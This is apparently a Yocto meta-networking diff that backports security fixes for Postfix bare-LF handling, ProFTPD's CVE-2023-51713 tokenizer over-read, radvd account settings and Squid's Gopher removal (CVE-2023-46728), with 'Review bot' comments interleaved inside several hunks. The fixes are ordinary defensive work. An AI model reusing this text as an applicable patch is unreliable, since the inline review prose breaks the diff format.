*/ + break; + } ++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf)) ++ state->err |= CLEANUP_STAT_BARE_LF; + start = vstring_str(state->bdat_get_buffer); + len = VSTRING_LEN(state->bdat_get_buffer); + if (state->err == CLEANUP_STAT_OK) { +@@ -4674,9 +4725,9 @@ + */ + xclient_allowed = + namadr_list_match(xclient_hosts, state->name, state->addr); +- smtp_forbid_bare_lf = SMTPD_STAND_ALONE((state)) == 0 +- && var_smtpd_forbid_bare_lf +- && !namadr_list_match(bare_lf_excl, state->name, state->addr); ++ smtp_detect_bare_lf = (SMTPD_STAND_ALONE((state)) == 0 && bare_lf_mask ++ && !namadr_list_match(bare_lf_excl, state->name, state->addr)) ? ++ bare_lf_mask : 0; + /* NOT: tls_reset() */ + if (got_helo == 0) + helo_reset(state); +@@ -5468,13 +5519,6 @@ + var_myhostname); + break; + +- case SMTP_ERR_LF: +- state->reason = REASON_BARE_LF; +- if (vstream_setjmp(state->client) == 0) +- smtpd_chat_reply(state, "521 5.5.2 %s Error: bare <LF> received", +- var_myhostname); +- break; +- + case 0: + + /* +@@ -5676,6 +5720,13 @@ + } + watchdog_pat(); + smtpd_chat_query(state); ++ if (IS_BARE_LF_REPLY_REJECT(smtp_got_bare_lf)) { ++ log_whatsup(state, "reject", "bare <LF> received"); ++ state->error_mask |= MAIL_ERROR_PROTOCOL; ++ smtpd_chat_reply(state, "%d 5.5.2 %s Error: bare <LF> received", ++ var_smtpd_forbid_bare_lf_code, var_myhostname); ++ break; ++ } + /* Safety: protect internal interfaces against malformed UTF-8. */ + if (var_smtputf8_enable && valid_utf8_string(STR(state->buffer), + LEN(state->buffer)) == 0) { +@@ -6024,11 +6075,11 @@ + namadr_list_match(xforward_hosts, state.name, state.addr); + + /* +- * Enforce strict SMTP line endings, with compatibility exclusions. ++ * Reject or normalize bare LF, with compatibility exclusions. 
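Review bot: In the `@@ -4674,9 +4725,9 @@` hunk the mask is forced to 0 for every client that matches `bare_lf_excl`, so an excluded client presumably gets neither the reject reply nor the CRLF.CRLF-only end-of-data check, and nothing at the assignment says so. I would add `/* Clients on the exclusion list get mask 0: no reject, no strict end-of-data. */` above it. The same assignment appears in the `@@ -6024,11 +6075,11 @@` hunk, where the "Reject or normalize bare LF, with compatibility exclusions" comment could be extended the same way. The expression is duplicated verbatim at both sites, so a small helper macro would keep them from drifting apart. Both enclosing functions continue outside their hunks.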
+ */ +- smtp_forbid_bare_lf = SMTPD_STAND_ALONE((&state)) == 0 +- && var_smtpd_forbid_bare_lf +- && !namadr_list_match(bare_lf_excl, state.name, state.addr); ++ smtp_detect_bare_lf = (SMTPD_STAND_ALONE((&state)) == 0 && bare_lf_mask ++ && !namadr_list_match(bare_lf_excl, state.name, state.addr)) ? ++ bare_lf_mask : 0; + + /* + * See if we need to turn on verbose logging for this client. +@@ -6095,6 +6146,10 @@ + MATCH_FLAG_RETURN + | match_parent_style(VAR_MYNETWORKS), + var_smtpd_forbid_bare_lf_excl); ++ if ((bare_lf_mask = name_code(bare_lf_mask_table, NAME_CODE_FLAG_NONE, ++ var_smtpd_forbid_bare_lf)) < 0) ++ msg_fatal("bad parameter value: '%s = %s'", ++ VAR_SMTPD_FORBID_BARE_LF, var_smtpd_forbid_bare_lf); + + /* + * Open maps before dropping privileges so we can read passwords etc. +@@ -6390,6 +6445,7 @@ + VAR_VIRT_MAILBOX_CODE, DEF_VIRT_MAILBOX_CODE, &var_virt_mailbox_code, 0, 0, + VAR_RELAY_RCPT_CODE, DEF_RELAY_RCPT_CODE, &var_relay_rcpt_code, 0, 0, + VAR_PLAINTEXT_CODE, DEF_PLAINTEXT_CODE, &var_plaintext_code, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF_CODE, DEF_SMTPD_FORBID_BARE_LF_CODE, &var_smtpd_forbid_bare_lf_code, 500, 599, + VAR_SMTPD_CRATE_LIMIT, DEF_SMTPD_CRATE_LIMIT, &var_smtpd_crate_limit, 0, 0, + VAR_SMTPD_CCONN_LIMIT, DEF_SMTPD_CCONN_LIMIT, &var_smtpd_cconn_limit, 0, 0, + VAR_SMTPD_CMAIL_LIMIT, DEF_SMTPD_CMAIL_LIMIT, &var_smtpd_cmail_limit, 0, 0, +@@ -6452,7 +6508,6 @@ + VAR_SMTPD_PEERNAME_LOOKUP, DEF_SMTPD_PEERNAME_LOOKUP, &var_smtpd_peername_lookup, + VAR_SMTPD_DELAY_OPEN, DEF_SMTPD_DELAY_OPEN, &var_smtpd_delay_open, + VAR_SMTPD_CLIENT_PORT_LOG, DEF_SMTPD_CLIENT_PORT_LOG, &var_smtpd_client_port_log, +- VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, + 0, + }; + static const CONFIG_NBOOL_TABLE nbool_table[] = { +@@ -6569,6 +6624,7 @@ + VAR_SMTPD_DNS_RE_FILTER, DEF_SMTPD_DNS_RE_FILTER, &var_smtpd_dns_re_filter, 0, 0, + VAR_SMTPD_REJ_FTR_MAPS, DEF_SMTPD_REJ_FTR_MAPS, &var_smtpd_rej_ftr_maps, 0, 0, + 
VAR_SMTPD_FORBID_BARE_LF_EXCL, DEF_SMTPD_FORBID_BARE_LF_EXCL, &var_smtpd_forbid_bare_lf_excl, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, 1, 0, + 0, + }; + static const CONFIG_RAW_TABLE raw_table[] = { +--- a/src/smtpd/smtpd_check.c ++++ b/src/smtpd/smtpd_check.c +@@ -48,6 +48,11 @@ + /* + /* char *smtpd_check_queue(state) + /* SMTPD_STATE *state; ++/* AUXILIARY FUNCTIONS ++/* void log_whatsup(state, action, text) ++/* SMTPD_STATE *state; ++/* const char *action; ++/* const char *text; + /* DESCRIPTION + /* This module implements additional checks on SMTP client requests. + /* A client request is validated in the context of the session state. +@@ -146,6 +151,11 @@ + /* The recipient address given with the RCPT TO or VRFY command. + /* .IP size + /* The message size given with the MAIL FROM command (zero if unknown). ++/* .PP ++/* log_whatsup() logs "<queueid>: <action>: <protocol state> ++/* from: <client-name[client-addr]>: <text>" plus the protocol ++/* (SMTP or ESMTP), and if available, EHLO, MAIL FROM, or RCPT ++/* TO. + /* BUGS + /* Policies like these should not be hard-coded in C, but should + /* be user-programmable instead. +@@ -987,8 +997,8 @@ + + /* log_whatsup - log as much context as we have */ + +-static void log_whatsup(SMTPD_STATE *state, const char *whatsup, +- const char *text) ++void log_whatsup(SMTPD_STATE *state, const char *whatsup, ++ const char *text) + { + VSTRING *buf = vstring_alloc(100); + +--- a/src/smtpd/smtpd_check.h ++++ b/src/smtpd/smtpd_check.h +@@ -25,6 +25,7 @@ + extern char *smtpd_check_data(SMTPD_STATE *); + extern char *smtpd_check_eod(SMTPD_STATE *); + extern char *smtpd_check_policy(SMTPD_STATE *, char *); ++extern void log_whatsup(SMTPD_STATE *, const char *, const char *); + + /* LICENSE + /* .ad diff --git a/meta-networking/recipes-daemons/postfix/postfix_3.6.5.bb b/meta-networking/recipes-daemons/postfix/postfix_3.6.7.bb index 343a8b2df0..fdda2e749e 100644 
--- a/meta-networking/recipes-daemons/postfix/postfix_3.6.5.bb
+++ b/meta-networking/recipes-daemons/postfix/postfix_3.6.7.bb
@@ -12,6 +12,9 @@ SRC_URI += "ftp://ftp.porcupine.org/mirrors/postfix-release/official/postfix-${P
 file://0003-makedefs-Use-native-compiler-to-build-makedefs.test.patch \
 file://0004-Fix-icu-config.patch \
 file://0005-makedefs-add-lnsl-and-lresolv-to-SYSLIBS-by-default.patch \
+ file://0006-makedefs-Account-for-linux-6.x-version.patch \
+ file://CVE-2023-51764-1.patch \
+ file://CVE-2023-51764-2.patch \
 "
-SRC_URI[sha256sum] = "300fa8811cea20d01d25c619d359bffab82656e704daa719e0c9afc4ecff4808"
+SRC_URI[sha256sum] = "e471df7e0eb11c4a1e574b6d7298f635386e2843b6b3584c25a04543d587e07f"
 UPSTREAM_CHECK_REGEX = "postfix\-(?P<pver>3\.6(\.\d+)+).tar.gz"
diff --git a/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch b/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch
new file mode 100644
index 0000000000..4b2cac1870
--- /dev/null
+++ b/meta-networking/recipes-daemons/proftpd/files/CVE-2023-51713.patch
@@ -0,0 +1,277 @@ +From 97bbe68363ccf2de0c07f67170ec64a8b4d62592 Mon Sep 17 00:00:00 2001 +From: TJ Saunders <tj@castaglia.org> +Date: Sun, 6 Aug 2023 13:16:26 -0700 +Subject: [PATCH] Issue #1683: Avoid an edge case when handling unexpectedly + formatted input text from client, caused by quote/backslash semantics, by + skipping those semantics. + +Upstream-Status: Backport [https://github.com/proftpd/proftpd/commit/97bbe68363ccf2de0c07f67170ec64a8b4d62592] +CVE: CVE-2023-51713 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + include/str.h | 3 ++- + src/main.c | 34 +++++++++++++++++++++++++++++---- + src/str.c | 22 +++++++++++++--------- + tests/api/str.c | 50 ++++++++++++++++++++++++++++++++++++++++++++++++- + 4 files changed, 94 insertions(+), 15 deletions(-) + +diff --git a/include/str.h b/include/str.h +index f08398017..1261ae2c2 100644 +--- a/include/str.h ++++ b/include/str.h +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server daemon +- * Copyright (c) 2008-2020 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -131,6 +131,7 @@ const char *pr_gid2str(pool *, gid_t); + #define PR_STR_FL_PRESERVE_COMMENTS 0x0001 + #define PR_STR_FL_PRESERVE_WHITESPACE 0x0002 + #define PR_STR_FL_IGNORE_CASE 0x0004 ++#define PR_STR_FL_IGNORE_QUOTES 0x0008 + + char *pr_str_get_token(char **, char *); + char *pr_str_get_token2(char **, char *, size_t *); +diff --git a/src/main.c b/src/main.c +index ee9c1eecb..e6b70731d 100644 +--- a/src/main.c ++++ b/src/main.c +@@ -811,8 +811,24 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + return NULL; + } + ++ /* By default, pr_str_get_word will handle quotes and backslashes for ++ * escaping characters. This can produce words which are shorter, use ++ * fewer bytes than the corresponding input buffer. 
++ * ++ * In this particular situation, we use the length of this initial word ++ * for determining the length of the remaining buffer bytes, assumed to ++ * contain the FTP command arguments. If this initial word is thus ++ * unexpectedly "shorter", due to nonconformant FTP text, it can lead ++ * the subsequent buffer scan, looking for CRNUL sequencees, to access ++ * unexpected memory addresses (Issue #1683). ++ * ++ * Thus for this particular situation, we tell the function to ignore/skip ++ * such quote/backslash semantics, and treat them as any other character ++ * using the IGNORE_QUOTES flag. ++ */ ++ + ptr = buf; +- wrd = pr_str_get_word(&ptr, str_flags); ++ wrd = pr_str_get_word(&ptr, str_flags|PR_STR_FL_IGNORE_QUOTES); + if (wrd == NULL) { + /* Nothing there...bail out. */ + pr_trace_msg("ctrl", 5, "command '%s' is empty, ignoring", buf); +@@ -820,6 +836,11 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + return NULL; + } + ++ /* Note that this first word is the FTP command. This is why we make ++ * use of the ptr buffer, which advances through the input buffer as ++ * we read words from the buffer. ++ */ ++ + subpool = make_sub_pool(p); + pr_pool_tag(subpool, "make_ftp_cmd pool"); + cmd = pcalloc(subpool, sizeof(cmd_rec)); +@@ -846,6 +867,7 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + arg_len = buflen - strlen(wrd); + arg = pcalloc(cmd->pool, arg_len + 1); + ++ /* Remember that ptr here is advanced past the first word. */ + for (i = 0, j = 0; i < arg_len; i++) { + pr_signals_handle(); + if (i > 1 && +@@ -854,14 +876,13 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + + /* Strip out the NUL by simply not copying it into the new buffer. 
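Review bot: `arg_len = buflen - strlen(wrd);` in the `@@ -846,6 +867,7 @@` hunk of src/main.c still sizes the CR-NUL scan from the length of the returned word rather than from how far `ptr` actually advanced. The bound is therefore only right while pr_str_get_word() consumes exactly as many bytes as it returns. PR_STR_FL_IGNORE_QUOTES closes the quote/backslash case, but whether other paths (skipped leading whitespace, a consumed delimiter) can move `ptr` further is not visible here. Deriving the bound from the pointer, e.g. `arg_len = buflen - (size_t) (ptr - buf);` after checking `(size_t) (ptr - buf) <= buflen`, would make the loop's `ptr[i]` reads independent of tokenizer semantics. make_ftp_cmd() starts and ends outside this hunk, so this needs confirming against the full function.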
*/ + have_crnul = TRUE; ++ + } else { + arg[j++] = ptr[i]; + } + } + +- cmd->arg = arg; +- +- if (have_crnul) { ++ if (have_crnul == TRUE) { + char *dup_arg; + + /* Now make a copy of the stripped argument; this is what we need to +@@ -871,6 +892,11 @@ static cmd_rec *make_ftp_cmd(pool *p, char *buf, size_t buflen, int flags) { + ptr = dup_arg; + } + ++ cmd->arg = arg; ++ ++ /* Now we can read the remamining words, as command arguments, from the ++ * input buffer. ++ */ + while ((wrd = pr_str_get_word(&ptr, str_flags)) != NULL) { + pr_signals_handle(); + *((char **) push_array(tarr)) = pstrdup(cmd->pool, wrd); +diff --git a/src/str.c b/src/str.c +index bcca4ae4d..a2ff74daf 100644 +--- a/src/str.c ++++ b/src/str.c +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server daemon +- * Copyright (c) 2008-2017 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -1209,7 +1209,7 @@ int pr_str_get_nbytes(const char *str, const char *units, off_t *nbytes) { + + char *pr_str_get_word(char **cp, int flags) { + char *res, *dst; +- char quote_mode = 0; ++ int quote_mode = FALSE; + + if (cp == NULL || + !*cp || +@@ -1238,24 +1238,28 @@ char *pr_str_get_word(char **cp, int flags) { + } + } + +- if (**cp == '\"') { +- quote_mode++; +- (*cp)++; ++ if (!(flags & PR_STR_FL_IGNORE_QUOTES)) { ++ if (**cp == '\"') { ++ quote_mode = TRUE; ++ (*cp)++; ++ } + } + + while (**cp && (quote_mode ? 
(**cp != '\"') : !PR_ISSPACE(**cp))) { + pr_signals_handle(); + +- if (**cp == '\\' && quote_mode) { +- ++ if (**cp == '\\' && ++ quote_mode == TRUE) { + /* Escaped char */ + if (*((*cp)+1)) { +- *dst = *(++(*cp)); ++ *dst++ = *(++(*cp)); ++ (*cp)++; ++ continue; + } + } + + *dst++ = **cp; +- ++(*cp); ++ (*cp)++; + } + + if (**cp) { +diff --git a/tests/api/str.c b/tests/api/str.c +index 050f5c563..bc64f0fb0 100644 +--- a/tests/api/str.c ++++ b/tests/api/str.c +@@ -1,6 +1,6 @@ + /* + * ProFTPD - FTP server testsuite +- * Copyright (c) 2008-2017 The ProFTPD Project team ++ * Copyright (c) 2008-2023 The ProFTPD Project team + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by +@@ -695,19 +695,23 @@ END_TEST + START_TEST (get_word_test) { + char *ok, *res, *str; + ++ mark_point(); + res = pr_str_get_word(NULL, 0); + fail_unless(res == NULL, "Failed to handle null arguments"); + fail_unless(errno == EINVAL, "Failed to set errno to EINVAL"); + ++ mark_point(); + str = NULL; + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle null str argument"); + fail_unless(errno == EINVAL, "Failed to set errno to EINVAL"); + ++ mark_point(); + str = pstrdup(p, " "); + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle whitespace argument"); + ++ mark_point(); + str = pstrdup(p, " foo"); + res = pr_str_get_word(&str, PR_STR_FL_PRESERVE_WHITESPACE); + fail_unless(res != NULL, "Failed to handle whitespace argument: %s", +@@ -723,6 +727,7 @@ START_TEST (get_word_test) { + ok = "foo"; + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + ++ mark_point(); + str = pstrdup(p, " # foo"); + res = pr_str_get_word(&str, 0); + fail_unless(res == NULL, "Failed to handle commented argument"); +@@ -742,6 +747,8 @@ START_TEST (get_word_test) { + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + + /* Test 
multiple embedded quotes. */ ++ ++ mark_point(); + str = pstrdup(p, "foo \"bar baz\" qux \"quz norf\""); + res = pr_str_get_word(&str, 0); + fail_unless(res != NULL, "Failed to handle quoted argument: %s", +@@ -770,6 +777,47 @@ START_TEST (get_word_test) { + + ok = "quz norf"; + fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ ++ /* Test embedded quotes with backslashes (Issue #1683). */ ++ mark_point(); ++ ++ str = pstrdup(p, "\"\\\\SYST\""); ++ res = pr_str_get_word(&str, 0); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ ++ ok = "\\SYST"; ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ mark_point(); ++ str = pstrdup(p, "\"\"\\\\SYST"); ++ res = pr_str_get_word(&str, 0); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ ++ /* Note that pr_str_get_word() is intended to be called multiple times ++ * on an advancing buffer, effectively tokenizing the buffer. This is ++ * why the function does NOT decrement its quote mode. ++ */ ++ ok = ""; ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ /* Now do the same tests with the IGNORE_QUOTES flag */ ++ mark_point(); ++ ++ str = ok = pstrdup(p, "\"\\\\SYST\""); ++ res = pr_str_get_word(&str, PR_STR_FL_IGNORE_QUOTES); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); ++ ++ mark_point(); ++ str = ok = pstrdup(p, "\"\"\\\\SYST"); ++ res = pr_str_get_word(&str, PR_STR_FL_IGNORE_QUOTES); ++ fail_unless(res != NULL, "Failed to handle quoted argument: %s", ++ strerror(errno)); ++ fail_unless(strcmp(res, ok) == 0, "Expected '%s', got '%s'", ok, res); + } + END_TEST + +-- +2.25.1 + diff --git a/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb b/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb index 686f1e5cdf..9d846f46a2 100644 
--- a/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb +++ b/meta-networking/recipes-daemons/proftpd/proftpd_1.3.7c.bb @@ -15,6 +15,7 @@ SRC_URI = "git://github.com/proftpd/proftpd.git;branch=${BRANCH};protocol=https file://contrib.patch \ file://build_fixup.patch \ file://proftpd.service \ + file://CVE-2023-51713.patch \ " S = "${WORKDIR}/git" diff --git a/meta-networking/recipes-daemons/radvd/radvd.inc b/meta-networking/recipes-daemons/radvd/radvd.inc index 2afaa48411..5da31b3f0e 100644 --- a/meta-networking/recipes-daemons/radvd/radvd.inc +++ b/meta-networking/recipes-daemons/radvd/radvd.inc @@ -58,7 +58,8 @@ do_install:append () { } USERADD_PACKAGES = "${PN}" -USERADD_PARAM:${PN} = "--system --home ${localstatedir}/run/radvd/ -M -g nogroup radvd" +GROUPADD_PARAM:${PN} = "--system nogroup" +USERADD_PARAM:${PN} = "--system --home ${localstatedir}/run/radvd/ -M -g nogroup --shell /sbin/nologin radvd" pkg_postinst:${PN} () { if [ -z "$D" -a -x /etc/init.d/populate-volatile.sh ]; then diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch new file mode 100644 index 0000000000..b11721041e --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46728.patch 
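Review bot: The radvd account is still placed in the shared `nogroup` group, which this hunk now also creates through `GROUPADD_PARAM:${PN} = "--system nogroup"`, so any other daemon running with that group shares group-level access with radvd. A dedicated group is the least-privilege choice: `GROUPADD_PARAM:${PN} = "--system radvd"` together with `-g radvd` in USERADD_PARAM, assuming nothing in the recipe or the packaged files depends on `nogroup` ownership. The added `--shell /sbin/nologin` is worth keeping, as it removes an interactive shell from the service account.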
@@ -0,0 +1,608 @@ +Partial backport of: + +From 6ea12e8fb590ac6959e9356a81aa3370576568c3 Mon Sep 17 00:00:00 2001 +From: Alex Rousskov <rousskov@measurement-factory.com> +Date: Tue, 26 Jul 2022 15:05:54 +0000 +Subject: [PATCH] Remove support for Gopher protocol (#1092) + +Gopher code quality remains too low for production use in most +environments. The code is a persistent source of vulnerabilities and +fixing it requires significant effort. We should not be spending scarce +Project resources on improving that code, especially given the lack of +strong demand for Gopher support. + +With this change, Gopher requests will be handled like any other request +with an unknown (to Squid) protocol. For example, HTTP requests with +Gopher URI scheme result in ERR_UNSUP_REQ. + +Default Squid configuration still considers TCP port 70 "safe". The +corresponding Safe_ports ACL rule has not been removed for consistency +sake: We consider WAIS port safe even though Squid refuses to forward +WAIS requests: + + acl Safe_ports port 70 # gopher + acl Safe_ports port 210 # wais + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46728.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/6ea12e8fb590ac6959e9356a81aa3370576568c3] +CVE: CVE-2023-46728 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + doc/Programming-Guide/Groups.dox | 5 - + doc/debug-sections.txt | 1 - + doc/manuals/de.po | 2 +- + doc/manuals/en.po | 2 +- + doc/manuals/en_AU.po | 2 +- + doc/manuals/es.po | 2 +- + doc/manuals/fr.po | 2 +- + doc/manuals/it.po | 2 +- + errors/af.po | 6 +- + errors/az.po | 6 +- + errors/bg.po | 6 +- + errors/ca.po | 6 +- + errors/cs.po | 6 +- + errors/da.po | 6 +- + errors/de.po | 6 +- + errors/el.po | 4 +- + errors/en.po | 6 +- + errors/errorpage.css | 2 +- + errors/es-mx.po | 3 +- + errors/es.po | 4 +- + errors/et.po | 6 +- + 
errors/fi.po | 7 +- + errors/fr.po | 6 +- + errors/he.po | 6 +- + errors/hu.po | 6 +- + errors/hy.po | 6 +- + errors/it.po | 4 +- + errors/ja.po | 6 +- + errors/ko.po | 6 +- + errors/lt.po | 6 +- + errors/lv.po | 6 +- + errors/nl.po | 6 +- + errors/pl.po | 6 +- + errors/pt-br.po | 6 +- + errors/pt.po | 6 +- + errors/ro.po | 4 +- + errors/ru.po | 6 +- + errors/sk.po | 6 +- + errors/sl.po | 6 +- + errors/sr-latn.po | 4 +- + errors/sv.po | 6 +- + errors/templates/ERR_UNSUP_REQ | 2 +- + errors/tr.po | 6 +- + errors/uk.po | 6 +- + errors/vi.po | 4 +- + errors/zh-hans.po | 6 +- + errors/zh-hant.po | 7 +- + src/FwdState.cc | 5 - + src/HttpRequest.cc | 6 - + src/IoStats.h | 2 +- + src/Makefile.am | 8 - + src/adaptation/ecap/Host.cc | 1 - + src/adaptation/ecap/MessageRep.cc | 2 - + src/anyp/ProtocolType.h | 1 - + src/anyp/Uri.cc | 1 - + src/anyp/UriScheme.cc | 3 - + src/cf.data.pre | 5 +- + src/client_side_request.cc | 4 - + src/error/forward.h | 2 +- + src/gopher.cc | 993 ----------------------- + src/gopher.h | 29 - + src/http/Message.h | 1 - + src/mgr/IoAction.cc | 3 - + src/mgr/IoAction.h | 2 - + src/squid.8.in | 2 +- + src/stat.cc | 19 - + src/tests/Stub.am | 1 - + src/tests/stub_gopher.cc | 17 - + test-suite/squidconf/regressions-3.4.0.1 | 1 - + 69 files changed, 88 insertions(+), 1251 deletions(-) + delete mode 100644 src/gopher.cc + delete mode 100644 src/gopher.h + delete mode 100644 src/tests/stub_gopher.cc + +--- a/src/FwdState.cc ++++ b/src/FwdState.cc +@@ -28,7 +28,6 @@ + #include "fde.h" + #include "FwdState.h" + #include "globals.h" +-#include "gopher.h" + #include "hier_code.h" + #include "http.h" + #include "http/Stream.h" +@@ -1004,10 +1003,6 @@ FwdState::dispatch() + httpStart(this); + break; + +- case AnyP::PROTO_GOPHER: +- gopherStart(this); +- break; +- + case AnyP::PROTO_FTP: + if (request->flags.ftpNative) + Ftp::StartRelay(this); +--- a/src/HttpRequest.cc ++++ b/src/HttpRequest.cc +@@ -18,7 +18,6 @@ + #include "Downloader.h" + #include 
"err_detail_type.h" + #include "globals.h" +-#include "gopher.h" + #include "http.h" + #include "http/one/RequestParser.h" + #include "http/Stream.h" +@@ -556,11 +555,6 @@ HttpRequest::maybeCacheable() + return false; + break; + +- case AnyP::PROTO_GOPHER: +- if (!gopherCachable(this)) +- return false; +- break; +- + case AnyP::PROTO_CACHE_OBJECT: + return false; + +--- a/src/IoStats.h ++++ b/src/IoStats.h +@@ -22,7 +22,7 @@ public: + int writes; + int write_hist[histSize]; + } +- Http, Ftp, Gopher; ++ Http, Ftp; + }; + + #endif /* SQUID_IOSTATS_H_ */ +--- a/src/Makefile.am ++++ b/src/Makefile.am +@@ -306,8 +306,6 @@ squid_SOURCES = \ + FwdState.h \ + Generic.h \ + globals.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + helper.h \ + hier_code.h \ +@@ -1259,8 +1257,6 @@ tests_testCacheManager_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + hier_code.h \ + helper.cc \ + $(HTCPSOURCE) \ +@@ -1678,8 +1674,6 @@ tests_testEvent_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -1914,8 +1908,6 @@ tests_testEventLoop_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -2145,8 +2137,6 @@ tests_test_http_range_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -2461,8 +2451,6 @@ tests_testHttpRequest_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -3307,8 +3295,6 @@ tests_testURL_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +--- a/src/adaptation/ecap/Host.cc ++++ b/src/adaptation/ecap/Host.cc +@@ -49,7 +49,6 @@ Adaptation::Ecap::Host::Host() + 
libecap::protocolHttp.assignHostId(AnyP::PROTO_HTTP); + libecap::protocolHttps.assignHostId(AnyP::PROTO_HTTPS); + libecap::protocolFtp.assignHostId(AnyP::PROTO_FTP); +- libecap::protocolGopher.assignHostId(AnyP::PROTO_GOPHER); + libecap::protocolWais.assignHostId(AnyP::PROTO_WAIS); + libecap::protocolUrn.assignHostId(AnyP::PROTO_URN); + libecap::protocolWhois.assignHostId(AnyP::PROTO_WHOIS); +--- a/src/adaptation/ecap/MessageRep.cc ++++ b/src/adaptation/ecap/MessageRep.cc +@@ -140,8 +140,6 @@ Adaptation::Ecap::FirstLineRep::protocol + return libecap::protocolHttps; + case AnyP::PROTO_FTP: + return libecap::protocolFtp; +- case AnyP::PROTO_GOPHER: +- return libecap::protocolGopher; + case AnyP::PROTO_WAIS: + return libecap::protocolWais; + case AnyP::PROTO_WHOIS: +--- a/src/anyp/ProtocolType.h ++++ b/src/anyp/ProtocolType.h +@@ -27,7 +27,6 @@ typedef enum { + PROTO_HTTPS, + PROTO_COAP, + PROTO_COAPS, +- PROTO_GOPHER, + PROTO_WAIS, + PROTO_CACHE_OBJECT, + PROTO_ICP, +--- a/src/anyp/Uri.cc ++++ b/src/anyp/Uri.cc +@@ -852,8 +852,6 @@ urlCheckRequest(const HttpRequest * r) + if (r->method == Http::METHOD_PUT) + rc = 1; + +- case AnyP::PROTO_GOPHER: +- + case AnyP::PROTO_WAIS: + + case AnyP::PROTO_WHOIS: +--- a/src/anyp/UriScheme.cc ++++ b/src/anyp/UriScheme.cc +@@ -87,9 +87,6 @@ AnyP::UriScheme::defaultPort() const + // Assuming IANA policy of allocating same port for base and TLS protocol versions will occur. 
+ return 5683; + +- case AnyP::PROTO_GOPHER: +- return 70; +- + case AnyP::PROTO_WAIS: + return 210; + +--- a/src/client_side_request.cc ++++ b/src/client_side_request.cc +@@ -33,7 +33,6 @@ + #include "fd.h" + #include "fde.h" + #include "format/Token.h" +-#include "gopher.h" + #include "helper.h" + #include "helper/Reply.h" + #include "http.h" +@@ -965,9 +964,6 @@ clientHierarchical(ClientHttpRequest * h + if (request->url.getScheme() == AnyP::PROTO_HTTP) + return method.respMaybeCacheable(); + +- if (request->url.getScheme() == AnyP::PROTO_GOPHER) +- return gopherCachable(request); +- + if (request->url.getScheme() == AnyP::PROTO_CACHE_OBJECT) + return 0; + +--- a/src/err_type.h ++++ b/src/err_type.h +@@ -65,7 +65,7 @@ typedef enum { + ERR_GATEWAY_FAILURE, + + /* Special Cases */ +- ERR_DIR_LISTING, /* Display of remote directory (FTP, Gopher) */ ++ ERR_DIR_LISTING, /* Display of remote directory (FTP) */ + ERR_SQUID_SIGNATURE, /* not really an error */ + ERR_SHUTTING_DOWN, + ERR_PROTOCOL_UNKNOWN, +--- a/src/HttpMsg.h ++++ 